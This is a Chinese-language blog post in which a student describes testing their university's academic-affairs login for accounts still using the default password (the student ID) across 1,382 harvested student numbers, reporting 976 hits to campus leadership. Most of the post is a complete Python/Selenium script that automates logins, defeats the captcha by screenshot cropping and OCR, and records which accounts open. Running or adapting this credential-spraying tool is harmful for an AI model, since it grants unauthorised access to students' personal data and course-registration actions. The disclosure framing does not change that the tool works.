關於針對本校教務系統漏洞的一次信息檢索

時間 2019-11-08

原文原文鏈接

由於好久之前看了一篇別人對教務系統進行信息檢索的實例，我也想查看一下咱們校區的教務系統到底有多安全。可是在實際寫腳本時候，卻遇到了不少問題，本篇博客也將是一篇技術總結。html

1、前期準備

思路是一個一個學號的去試是否使用了默認密碼，我瞭解到16級的教務系統默認密碼是隨機碼，18級的教務系統默認密碼是身份證後六位，但恰恰只有咱們17級的默認密碼就是學號，並且如今沒法進行更改，因此我只針對17級進行檢索。git

學號是從考試周的工做表獲得的，最開始想的是本身構造，後來發現直接能夠在專業羣聊找到全部專業的考試安排表。github

而後針對學號去重。腳本以下web

 1 import sys
 2 
 3 vis = {}
 4 
 5 def main():
 6     file_out = open("./data/xh.txt","w+")
 7     with open("./data/xuehao.txt","r") as file_in:
 8         for user in file_in.readlines():
 9             user = user.strip('\n')
10             if user not in vis:
11                 vis[user] = 1
12                 print(user,file=file_out)
13     file_out.close()
14 
15 if __name__ == "__main__":
16     main()
17 else:
18     pass

而後就是開始針對教務系統的模擬登陸腳本編寫了。瀏覽器

2、腳本編寫以及運行

用fiddler掃了一篇網頁後，發現是POST傳遞參數安全

因而就想直接構造一個表單數據POST傳遞上去查看返回信息，可是遇到了一個問題，驗證碼，開始我想直接把驗證碼經過url爬下來，可是F12後發現，驗證碼的地址是臨時隨機產生的，以下圖ide

找了不少方法，仍是沒有解決這個隨機驗證碼的問題。後來借鑑了一種可行的方法，利用selenium擴展庫的webdriver直接模擬登陸，而後每次截圖獲取到驗證碼，雖然效率比較低，但倒是一種可行方案。學習

解決方案以下，利用截圖獲取驗證碼圖片，而後再利用OCR識別驗證碼，識別出來可能有空格，因此replace就行了。測試

其餘部分就比較好寫了，經過xpath得到網頁元素模塊，而後直接枚舉便可。url

3、信息分析

運行結果以下

一共測試了1382個學號，其中有976個都沒有更改密碼，可是教務系統中包含了大量的我的信息。

這是個人教務系統的我的主頁，如果不法分子惡意爬取這些信息將可能形成一些很差的後果。並且教務系統能夠直接選課，退課，以及等等和學習有關的操做，其安全問題不可小覷。

固然本次信息檢索到此已經結束，只是針對是否改密進行檢索，獲得結果後我也立刻整理髮送給了校區趙校長。

4、總結

照成這麼多人沒有改密的緣由有一點是由於教務系統無法隨時進行改密，包括一些18級，16級的同窗也說沒法改密，可是他們的密碼相對而言比較安全，但咱們使用學號做爲默認密碼實在是過於簡單。

通過幾回思考以後，仍是決定把代碼整理並放出來，僅供參考學習。

編寫腳本遇到的一些問題大多都是環境沒有配置好的問題，也都獲得解決。

腳本代碼以下：

 1 import time
 2 import pytesseract
 3 from PIL import Image, ImageEnhance
 4 from selenium import webdriver
 5 from selenium.webdriver.common.by import By
 6  
 7 url = ""
 8 
 9 def work(user_data,pass_data):
10     # 一、打開瀏覽器，最大化瀏覽器
11     driver = webdriver.Firefox()
12     driver.get(url)
13     driver.implicitly_wait(40)
14     driver.maximize_window()
15 
16     userElement = driver.find_element(By.XPATH, "/html/body/table/tbody/tr/td/table[3]/tbody/tr/td[2]/form/table/tbody/tr[2]/td/table/tbody/tr[1]/td[2]/input")
17     passElement = driver.find_element(By.XPATH, "/html/body/table/tbody/tr/td/table[3]/tbody/tr/td[2]/form/table/tbody/tr[2]/td/table/tbody/tr[2]/td[2]/input")
18     codeElement = driver.find_element(By.XPATH, "/html/body/table/tbody/tr/td/table[3]/tbody/tr/td[2]/form/table/tbody/tr[2]/td/table/tbody/tr[3]/td[2]/input")
19 
20     # 二、截取屏幕內容，保存到本地
21     driver.save_screenshot("./test/01.png")
22     
23     # 三、打開截圖，獲取驗證碼位置，截取保存驗證碼
24     ran = Image.open("./test/01.png")
25     box = (829, 495, 928, 519)  # 獲取驗證碼位置,表明（左，上，右，下）
26     ran.crop(box).save("./test/02.png")
27     
28     # 四、獲取驗證碼圖片，讀取驗證碼
29     imageCode = Image.open("./test/02.png")
30     code = pytesseract.image_to_string(imageCode).strip().replace(" ","")
31     # 五、收到驗證碼，進行輸入驗證
32     
33     userElement.send_keys(user_data)
34     passElement.send_keys(pass_data)
35     codeElement.send_keys(code)
36     click_login = driver.find_element(By.XPATH, "//*[@id=\"btnSure\"]")
37     click_login.click()
38     time.sleep(0.01)
39 
40     try:
41         title_data = driver.title
42         if title_data.find('我的管理') != -1:
43             print(user_data,'success')
44             driver.close()
45             return 0
46         else:
47             error_data = driver.find_element(By.XPATH, "/html/body/table/tbody/tr/td/table[3]/tbody/tr/td[2]/form/table/tbody/tr[1]/td/table/tbody/tr/td/table/tbody/tr[2]/td[2]/strong/font").text
48             if error_data.find('驗證碼錯誤') != -1:
49                 driver.close()
50                 return 1
51             elif error_data.find('密碼不正確') != -1:
52                 print(user_data,'wrong')
53                 driver.close()
54                 return 2
55             elif error_data.find('證件號') != -1:
56                 driver.close()
57                 return 3
58     except Exception:
59             print(user_data,'abnormal')
60             driver.close()
61             return 1
62 
63 def main():
64     i = 1
65     sum = 0
66     ans = ''
67     file_out = open("./data/result.txt",'w+')
68     with open("./data/xh.txt",'r') as file_in:
69         for user in file_in.readlines():
70             user = user.strip('\n')
71             password = user
72             print(i,end = ' ')
73             i += 1
74             ret = work(user,password)
75             while ret == 1:
76                 ret = work(user,password)
77             if ret == 0:
78                 sum += 1
79                 ans = 'correct'
80             elif ret == 2:
81                 ans = 'wrong'
82             elif ret == 3:
83                 ans = 'Number is wrong'
84             print(user,ans,file=file_out)
85     print('Use the default password persons:',sum,file=file_out)
86     file_out.close()
87 
88 
89 if __name__ == "__main__":
90     main()
91 else:
92     pass